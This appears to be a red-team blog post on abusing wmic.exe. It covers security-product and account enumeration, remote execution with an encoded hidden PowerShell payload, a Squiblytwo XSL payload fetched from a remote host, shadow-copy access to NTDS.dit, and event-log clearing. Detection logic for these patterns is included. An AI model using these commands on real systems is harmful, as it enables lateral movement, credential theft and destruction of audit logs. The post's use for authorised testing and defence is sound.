The Silent Interrogator: Advanced Wmic for Red Team Operations


Microsoft has been retiring wmic.exe for a while now: it is deprecated, shipped only as a Feature on Demand in Windows 11 22H2, and not present by default in 24H2. But on every Windows 10 box and on Server 2016/2019/2022 it's still there, and that covers most of the enterprise environments you'll see on an engagement.

Wmic is useful for the same reason dsquery and net are: it’s signed, it’s expected on the box, and it dodges a lot of the string-based detections aimed at PowerShell. It does enumeration, remote execution, and lateral movement, all through DCOM/RPC.


1. Discovery beyond the basics

Basic enumeration is easy. Knowing where to look is the harder part.

Antivirus and firewall status

wmic service list tells you which services exist, not which security product is actually registered as protecting the host. The WMI root\SecurityCenter2 namespace is what Windows itself uses to track registered security products on client OSes; it does not exist on Server SKUs, so an "Invalid namespace" error there is expected rather than a sign of tampering.

wmic /namespace:\\root\SecurityCenter2 path AntiVirusProduct get displayName, productState, pathToSignedProductExe

productState is a bitmask, easiest to read as six hex digits. Microsoft does not document the layout, but the decoding everyone uses is: the middle byte is 0x10 (or 0x11) when real-time protection is enabled and 0x00 (or 0x01) when it is disabled or snoozed, and the low byte is 0x00 when definitions are current and 0x10 when they are out of date. So 0x061100 is an enabled, up-to-date product and 0x060100 the same product switched off; 0x000000 means nothing is registered as watching. Exact meanings can still drift by vendor, so a change in the value over the course of an engagement tells you more than any single reading. The same namespace exposes FirewallProduct and AntiSpywareProduct with the same columns.
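To make the bitmask decode concrete, here is an added example (not from the original post) that parses the output of the query above when run with /format:csv and applies the decoding just described. The sample output, the host name WS01 and the product names are constructed, and the byte layout is the community interpretation, not a Microsoft specification.

```python
import csv

# Constructed sample of
#   wmic /namespace:\\root\SecurityCenter2 path AntiVirusProduct get displayName,pathToSignedProductExe,productState /format:csv
# on a host where a third-party product has registered and Defender has stepped aside.
# Host and product names are invented; wmic prints a leading blank line and orders
# columns alphabetically, which is reproduced here.
SAMPLE_CSV = """
Node,displayName,pathToSignedProductExe,productState
WS01,Windows Defender,windowsdefender://,393472
WS01,Contoso Endpoint Shield,C:\\Program Files\\Contoso\\shield.exe,266240
"""

def parse_wmic_csv(text):
    """wmic /format:csv output, blank lines skipped. If it was redirected to a file,
    open that file with encoding='utf-16'."""
    return list(csv.DictReader(ln for ln in text.splitlines() if ln.strip()))

def decode_product_state(state):
    """Decode productState with the community interpretation of the undocumented
    layout (assumption, not a Microsoft specification): of the six hex digits,
    middle byte 0x10/0x11 = real-time protection on, 0x00/0x01 = off or snoozed;
    low byte 0x00 = definitions current, 0x10 = out of date."""
    value = int(state)
    middle = (value >> 8) & 0xFF
    low = value & 0xFF
    return {
        "hex": f"0x{value:06x}",
        "enabled": middle in (0x10, 0x11),
        "up_to_date": low == 0x00,
    }

def triage_av(text):
    """Decode every registered product; return (per-product states, names that are on)."""
    products = {row["displayName"]: decode_product_state(row["productState"])
                for row in parse_wmic_csv(text)}
    active = sorted(name for name, st in products.items() if st["enabled"])
    return products, active

if __name__ == "__main__":
    products, active = triage_av(SAMPLE_CSV)
    for name, st in products.items():
        print(f"{name:<25} {st['hex']}  enabled={st['enabled']}  up_to_date={st['up_to_date']}")
    print("watching:", ", ".join(active) or "nothing")
```

Run it against output you pulled back with /format:csv; the useful signal is the `active` list being empty, or a product you did not expect holding the only enabled slot.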

Installed patches (QFE)

Before you fire off a kernel exploit, check whether the fix is already installed. Win32_QuickFixEngineering only lists updates the servicing stack recorded as hotfixes, and a cumulative update rolls many KBs into one entry, so compare the newest HotfixId against the OS build from ver before you trust an apparent gap.

:: All Quick Fix Engineering entries with install date
wmic qfe get HotfixId, InstalledOn, Description

User accounts (the SID walk)

net user is heavily signatured. The WMI path reads the same SAM data and draws less attention.

wmic useraccount get name, sid, disabled

Sort by the numeric RID (the last field of the SID), not by the SID string, to find the oldest accounts: RIDs are handed out sequentially and never reused, and a plain string sort puts -1000 before -500. The built-in Administrator ends in -500 whatever it has been renamed to, Guest is -501, and any RID below 1000 is a built-in or well-known account; accounts created after install start at 1000. On a domain-joined host add where "localaccount=true", otherwise the query walks every account in the domain and can take minutes.
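As an added example (not part of the original post), the walk applied to the /format:csv form of the query above. The host, account names and SID values are constructed, and they include a renamed built-in Administrator plus a low-privilege decoy named Administrator, which is exactly the case where sorting by name or by SID string misleads and sorting by RID does not.

```python
import csv

# Constructed sample of `wmic useraccount where "localaccount=true" get name,sid,disabled
# /format:csv`. Host, names and SIDs are invented. The built-in Administrator (RID 500)
# has been renamed to ITAdmin and a decoy named Administrator was created later
# (RID 1013): a name sort hides that, a RID sort exposes it.
SAMPLE_CSV = """
Node,Disabled,Name,SID
WS01,FALSE,ITAdmin,S-1-5-21-1004336348-1177238915-682003330-500
WS01,TRUE,Guest,S-1-5-21-1004336348-1177238915-682003330-501
WS01,TRUE,DefaultAccount,S-1-5-21-1004336348-1177238915-682003330-503
WS01,TRUE,WDAGUtilityAccount,S-1-5-21-1004336348-1177238915-682003330-504
WS01,FALSE,svc_backup,S-1-5-21-1004336348-1177238915-682003330-1001
WS01,FALSE,jsmith,S-1-5-21-1004336348-1177238915-682003330-1000
WS01,FALSE,helpdesk,S-1-5-21-1004336348-1177238915-682003330-1012
WS01,FALSE,Administrator,S-1-5-21-1004336348-1177238915-682003330-1013
"""

# Well-known local RIDs below 1000; RIDs from 1000 up are allocated to created accounts.
WELL_KNOWN_RIDS = {
    500: "built-in Administrator",
    501: "built-in Guest",
    503: "DefaultAccount",
    504: "WDAGUtilityAccount",
}

def parse_wmic_csv(text):
    """wmic /format:csv output: a leading blank line, then a header row. When the
    output was redirected to a file, open it with encoding='utf-16'."""
    return list(csv.DictReader(ln for ln in text.splitlines() if ln.strip()))

def rid_of(sid):
    """Relative identifier: the last dash-separated field of the SID."""
    return int(sid.rsplit("-", 1)[1])

def walk_sids(text):
    """Return the accounts ordered by RID (allocation order), with built-in flags."""
    accounts = []
    for row in parse_wmic_csv(text):
        rid = rid_of(row["SID"])
        accounts.append({
            "name": row["Name"],
            "rid": rid,
            "disabled": row["Disabled"].upper() == "TRUE",
            "builtin": rid < 1000,
            "label": WELL_KNOWN_RIDS.get(rid, "well-known" if rid < 1000 else "created"),
        })
    return sorted(accounts, key=lambda a: a["rid"])

def real_administrator(accounts):
    """The RID-500 account, whatever it is called now."""
    return next(a["name"] for a in accounts if a["rid"] == 500)

def decoys(accounts):
    """Created accounts that borrow a well-known name: honeytokens or misdirection."""
    names = {v.split()[-1] for v in WELL_KNOWN_RIDS.values()}   # Administrator, Guest, ...
    return [a["name"] for a in accounts if not a["builtin"] and a["name"] in names]

def oldest_created(accounts):
    """First account created after install: the lowest RID at or above 1000."""
    return next(a for a in accounts if a["rid"] >= 1000)

if __name__ == "__main__":
    for a in walk_sids(SAMPLE_CSV):
        state = "disabled" if a["disabled"] else "enabled"
        print(f"{a['rid']:>5}  {a['name']:<20} {state:<9} {a['label']}")
```

The decoy check is the part worth keeping: an account called Administrator with a RID in the thousands is either a honeytoken someone is watching or an admin who has been through this before, and both change how you proceed.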

Startup persistence

Useful for spotting someone else's persistence, or verifying your own. Win32_StartupCommand only covers the Run/RunOnce keys and the Startup folders; services, scheduled tasks and WMI event subscriptions need separate queries.

wmic startup get caption, command, location, user

2. Lateral movement via remote execution

Wmic talks to remote nodes over DCOM/RPC. No RDP required, just TCP 135 for the endpoint mapper plus the dynamic RPC range. You need local administrator rights on the target, and a local account other than the built-in Administrator is blocked by UAC remote restrictions unless LocalAccountTokenFilterPolicy is set to 1.

process call create

The /node switch lets you spawn a process on a remote box.

:: /node:<TargetIP> /user:<Domain\User> /password:<Pass> process call create "<Command>"
wmic /node:"10.10.1.5" /user:"CORP\Admin" /password:"Pass123" process call create "cmd.exe /c start powershell.exe -nop -w hidden -enc [PAYLOAD]"

One catch: remote process call create doesn't return stdout to your terminal. You'll get ReturnValue = 0 and a ProcessId, and that's it. A second catch: the /password value is part of your own command line, so it lands in the source host's Event ID 4688 if command-line auditing is on there. To get output, redirect on the target side and pull it back over SMB (the same admin rights open c$):

wmic /node:"10.10.1.5" ... process call create "cmd.exe /c whoami > C:\temp\out.txt"
type \\10.10.1.5\c$\temp\out.txt

3. Do not run wmic product list

You'll see this command in old blog posts. Don't run it.

Querying Win32_Product triggers a Windows Installer consistency check, with repair, of every installed MSI package. It takes minutes, and every package checked writes Event ID 1035 (source MsiInstaller, "Windows Installer reconfigured the product…") to the Application log. One command, hundreds of log entries, all stamped with your session and account.

For software inventory, read the registry instead (HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall and, on 64-bit hosts, the Wow6432Node equivalent). For security tools, use the SecurityCenter2 query above.


4. XSL bypass (Squiblytwo)

Wmic accepts a /format: argument that points at an XSL stylesheet. That stylesheet can be local or remote, and MSXML lets a stylesheet embed JScript or VBScript that runs during the transform.

Because wmic.exe is a signed Microsoft binary that is usually allowed, this often slips past AppLocker script rules: the script executes inside the wmic.exe process and never touches wscript.exe or cscript.exe.

wmic process get name /format:"http://10.10.14.5/payload.xsl"

Payload:

<?xml version="1.0"?>
<ns0:stylesheet xmlns:ns0="http://www.w3.org/1999/XSL/Transform" xmlns:ns1="urn:schemas-microsoft-com:xslt" xmlns:user="placeholder" version="1.0">
  <ns0:output method="text" />
  <!-- MSXML runs this block while compiling the stylesheet. The prefix named in
       implements-prefix must be declared on the root element, hence xmlns:user above. -->
  <ns1:script implements-prefix="user" language="JScript">
  <![CDATA[
    var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
  ]]>
  </ns1:script>
</ns0:stylesheet>

Wmic fetches the file, MSXML compiles the stylesheet, and the script block runs before a single line of process output is written. Swap calc.exe for whatever you actually want.

This technique has been on every modern EDR's radar since it went public in 2018 as Squiblytwo (the wmic counterpart of the 2016 regsvr32 Squiblydoo trick), so don't expect it to work blind. Test against the target's defenses first.


5. Shadow copy abuse

Like vssadmin, Wmic can talk to the Volume Shadow Copy Service. Useful for grabbing locked files like NTDS.dit or the SYSTEM registry hive: once the copy exists, take its DeviceObject value (a \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyN path) and copy the files out from under it. Creating a copy needs administrator rights, and the ID you get back is what the cleanup step below needs.

:: Create a shadow copy of C:
wmic shadowcopy call create Volume="C:\"

:: List existing shadow copies (get the ID/path)
wmic shadowcopy list brief

:: Clean up
wmic shadowcopy where ID="{ID-GOES-HERE}" delete

6. Log clearing

Wmic can clear event logs. Clearing the Security log generates Security Event ID 1102 ("The audit log was cleared"); clearing any other log writes Event ID 104 to the System log. Both are among the loudest signals a Windows host can emit, and any log forwarding already in place has shipped the earlier entries off-box before you touch them. Don't do it unless you're already burning the host.

wmic nteventlog where "logfilename='System'" call cleareventlog
wmic nteventlog where "logfilename='Security'" call cleareventlog

7. Forensic footprint

Wmic is not silent.

  1. Process creation. wmic.exe shows up in Security Event ID 4688. If command line auditing is on, your full command line (XSL URL, /node target, /password value and all) lands in the log next to it.
  2. WMI-Activity logs. Microsoft-Windows-WMI-Activity/Operational is enabled by default and records provider and query failures (5858) and temporary and permanent event-consumer registrations (5860/5861); it does not record every Win32_Process.Create call. The lateral-movement trail is in process telemetry on the target instead: 4688 or Sysmon Event 1 shows WmiPrvSE.exe as the parent of the cmd.exe or powershell.exe you spawned, which legitimate admin sessions rarely produce.
  3. Network traffic. Remote WMI starts with TCP 135 (the RPC endpoint mapper) and then moves to a dynamic high port (49152-65535 on Vista and later) for the DCOM session. That pattern looks nothing like SMB (445) and stands out in flow data.
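The footprint above as detection logic, added here and not part of the original post: a few constructed 4688-style events (field names follow the Windows event schema; hosts, users, IPs and paths are invented) run through rules for the command-line patterns this post uses and for WmiPrvSE.exe spawning a shell on the target. The rule names and severities are this example's own choices.

```python
import re

# Constructed Security 4688 events in the flattened form a SIEM hands over. Field
# names follow the Windows event schema; hosts, users, IPs and paths are invented.
SAMPLE_EVENTS = [
    {"Computer": "WS01", "SubjectUserName": "jsmith",
     "ParentProcessName": "C:\\Windows\\System32\\cmd.exe",
     "NewProcessName": "C:\\Windows\\System32\\wbem\\WMIC.exe",
     "CommandLine": 'wmic  /node:"10.10.1.5" /user:"CORP\\Admin" /password:"Pass123" '
                    'process call create "cmd.exe /c whoami > C:\\temp\\out.txt"'},
    {"Computer": "WS01", "SubjectUserName": "jsmith",
     "ParentProcessName": "C:\\Windows\\System32\\cmd.exe",
     "NewProcessName": "C:\\Windows\\System32\\wbem\\WMIC.exe",
     "CommandLine": 'wmic process get name /format:"http://10.10.14.5/payload.xsl"'},
    {"Computer": "SRV05", "SubjectUserName": "Admin",
     "ParentProcessName": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe",
     "NewProcessName": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "cmd.exe /c whoami > C:\\temp\\out.txt"},
    {"Computer": "WS01", "SubjectUserName": "jsmith",
     "ParentProcessName": "C:\\Windows\\System32\\cmd.exe",
     "NewProcessName": "C:\\Windows\\System32\\wbem\\WMIC.exe",
     "CommandLine": "wmic qfe get HotfixId, InstalledOn, Description"},
    {"Computer": "WS01", "SubjectUserName": "jsmith",
     "ParentProcessName": "C:\\Windows\\System32\\cmd.exe",
     "NewProcessName": "C:\\Windows\\System32\\wbem\\WMIC.exe",
     "CommandLine": "wmic shadowcopy call create Volume='C:\\'"},
    {"Computer": "WS01", "SubjectUserName": "jsmith",
     "ParentProcessName": "C:\\Windows\\System32\\cmd.exe",
     "NewProcessName": "C:\\Windows\\System32\\wbem\\WMIC.exe",
     "CommandLine": "wmic nteventlog where \"logfilename='Security'\" call cleareventlog"},
    {"Computer": "WS01", "SubjectUserName": "jsmith",
     "ParentProcessName": "C:\\Windows\\System32\\cmd.exe",
     "NewProcessName": "C:\\Windows\\System32\\wbem\\WMIC.exe",
     "CommandLine": "wmic product get name, version"},
]

# (severity, rule name, regex over the lowercased, whitespace-collapsed command line)
RULES = [
    ("high", "wmic_remote_exec", r"/node:"),                      # lateral movement from this host
    ("medium", "credential_on_cmdline", r"/password:"),           # plaintext password now in the log
    ("high", "wmic_xsl_script", r"/format:\S*(https?:|\.xsl)"),   # Squiblytwo-style XSL script processing
    ("high", "wmic_shadowcopy", r"\bshadowcopy\b"),               # prep for NTDS.dit / SAM theft
    ("critical", "wmic_clear_eventlog", r"cleareventlog"),        # anti-forensics
    ("low", "wmic_win32_product", r"\bproduct\b"),                # Win32_Product: noisy, not hostile
]

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def triage(event):
    """Return a list of (severity, rule) hits for one 4688 event."""
    hits = []
    cmd = " ".join(event.get("CommandLine", "").split()).lower()   # operators vary spacing and case
    if basename(event.get("NewProcessName", "")) == "wmic.exe":
        hits += [(sev, name) for sev, name, pattern in RULES if re.search(pattern, cmd)]
        if not hits:
            hits.append(("info", "wmic_local_enum"))      # plain local enumeration, still worth counting
    if (basename(event.get("ParentProcessName", "")) == "wmiprvse.exe"
            and basename(event.get("NewProcessName", "")) in SHELLS):
        hits.append(("high", "wmiprvse_spawned_shell"))   # target side of process call create
    return hits

def triage_all(events):
    """Flatten hits across events as (host, severity, rule) triples."""
    return [(e["Computer"], sev, rule) for e in events for sev, rule in triage(e)]

if __name__ == "__main__":
    for host, sev, rule in triage_all(SAMPLE_EVENTS):
        print(f"{host:<6} {sev:<8} {rule}")
```

Two of the hits need no command line at all: the WmiPrvSE.exe parent on SRV05 fires from the process-tree fields alone, which is why the target side of process call create is caught even on a host without command-line auditing, and the same pair of events (wmic.exe with /node on WS01, a shell under WmiPrvSE.exe on SRV05 seconds later) is what the blue team correlates into one lateral-movement finding.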

Closing

Wmic is on borrowed time. The install base buys you years though, especially in environments that haven't finished their Server 2019 migrations, let alone touched Windows 11 24H2. It's worth keeping in the toolkit not because it's quiet (it isn't), but because the binary is already trusted on the host and the protocol is already there. When you do reach for it, know the footprint and have the CIM cmdlets (Get-CimInstance, Invoke-CimMethod) ready for the boxes where wmic.exe finally isn't.



Author: UncleSp1d3r